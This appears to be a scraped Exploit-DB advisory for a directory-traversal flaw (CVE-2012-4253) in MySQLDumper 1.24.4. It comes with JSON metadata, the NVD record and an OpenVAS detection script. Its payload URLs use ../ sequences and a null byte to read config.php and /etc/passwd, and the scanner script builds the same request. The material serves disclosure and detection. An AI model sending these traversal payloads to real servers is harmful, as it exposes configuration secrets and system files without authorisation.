MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access
2012-04-27T00:00:00
ID EDB-ID:37129 Type exploitdb Reporter AkaStep Modified 2012-04-27T00:00:00
Description
MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access. CVE-2012-4253. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
{"id": "EDB-ID:37129", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access", "description": "MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access. CVE-2012-4253. Webapps exploit for php platform", "published": "2012-04-27T00:00:00", "modified": "2012-04-27T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/37129/", "reporter": "AkaStep", "references": [], "cvelist": ["CVE-2012-4253"], "lastseen": "2016-02-04T05:08:29", "viewCount": 3, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2016-02-04T05:08:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4253"]}, {"type": "exploitdb", "idList": ["EDB-ID:37126"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902675"]}], "modified": "2016-02-04T05:08:29", "rev": 2}, "vulnersScore": 5.5}, "sourceHref": "https://www.exploit-db.com/download/37129/", "sourceData": "source: http://www.securityfocus.com/bid/53306/info\r\n \r\nMySQLDumper is prone to multiple security vulnerabilities, including:\r\n \r\n1. Multiple cross-site scripting vulnerabilities.\r\n2. A local file-include vulnerability.\r\n3. Multiple cross-site request-forgery vulnerabilities.\r\n4. Multiple information-disclosure vulnerabilities.\r\n5. A directory-traversal vulnerability.\r\n \r\nExploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.\r\n \r\nMySQLDumper 1.24.4 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php\r\nhttp://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00\r\n", "osvdbidlist": ["81615"]}
{"cve": [{"lastseen": "2020-10-03T12:06:09", "description": "Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.", "edition": 3, "cvss3": {}, "published": "2012-08-13T18:55:00", "title": "CVE-2012-4253", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4253"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:mysqldumper:mysqldumper:1.24.4"], "id": "CVE-2012-4253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4253", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T05:08:08", "description": "MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access. CVE-2012-4253. Webapps exploit for perl platform", "published": "2012-04-27T00:00:00", "type": "exploitdb", "title": "MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4253"], "modified": "2012-04-27T00:00:00", "id": "EDB-ID:37126", "href": "https://www.exploit-db.com/exploits/37126/", "sourceData": "source: http://www.securityfocus.com/bid/53306/info\r\n \r\nMySQLDumper is prone to multiple security vulnerabilities, including:\r\n \r\n1. Multiple cross-site scripting vulnerabilities.\r\n2. A local file-include vulnerability.\r\n3. Multiple cross-site request-forgery vulnerabilities.\r\n4. Multiple information-disclosure vulnerabilities.\r\n5. A directory-traversal vulnerability.\r\n \r\nExploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.\r\n \r\nMySQLDumper 1.24.4 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37126/"}], "openvas": [{"lastseen": "2020-05-12T17:29:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4252", "CVE-2012-4254", "CVE-2012-4255", "CVE-2012-4253", "CVE-2012-4251"], "description": "This host is running MySQLDumper and is prone to multiple\n vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:1361412562310902675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902675", "type": "openvas", "title": "MySQLDumper Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# MySQLDumper Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysqldumper:mysqldumper\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902675\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2012-4251\", \"CVE-2012-4252\", \"CVE-2012-4253\",\n \"CVE-2012-4254\", \"CVE-2012-4255\");\n script_bugtraq_id(53306);\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 15:02:29 +0530 (Mon, 30 Apr 2012)\");\n script_name(\"MySQLDumper Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://1337day.com/exploits/18146\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75283\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75284\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75285\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75286\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75287\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_mysqldumper_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"mysqldumper/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary script code in the context of the affected site, steal cookie based\n authentication credentials, gain sensitive information or upload arbitrary\n code.\");\n script_tag(name:\"affected\", value:\"MySQLDumper version 1.24.4\");\n script_tag(name:\"insight\", value:\"The flaws are due to\n\n - Input passed via the 'language' parameter to signin.php and 'action'\n parameter to filemanagement.php script is not properly verified before\n being used, which allows attackers to read arbitrary files via a\n ../(dot dot) sequences.\n\n - Improper validation of user-supplied input passed via the 'phase' parameter\n to install.php, 'page' parameter to index.php, 'bid' parameter to sql.php\n and 'filename' parameter to restore.php, which allows attackers to execute\n arbitrary HTML and script code.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is running MySQLDumper and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nfiles = traversal_files();\n\nforeach file ( keys( files ) ) {\n\n url = dir + \"/filemanagement.php?action=dl&f=\" +\n crap( data:\"../\", length:3*15 ) + files[file] + \"%00\";\n\n if( http_vuln_check( port:port, url:url, pattern:file, check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}
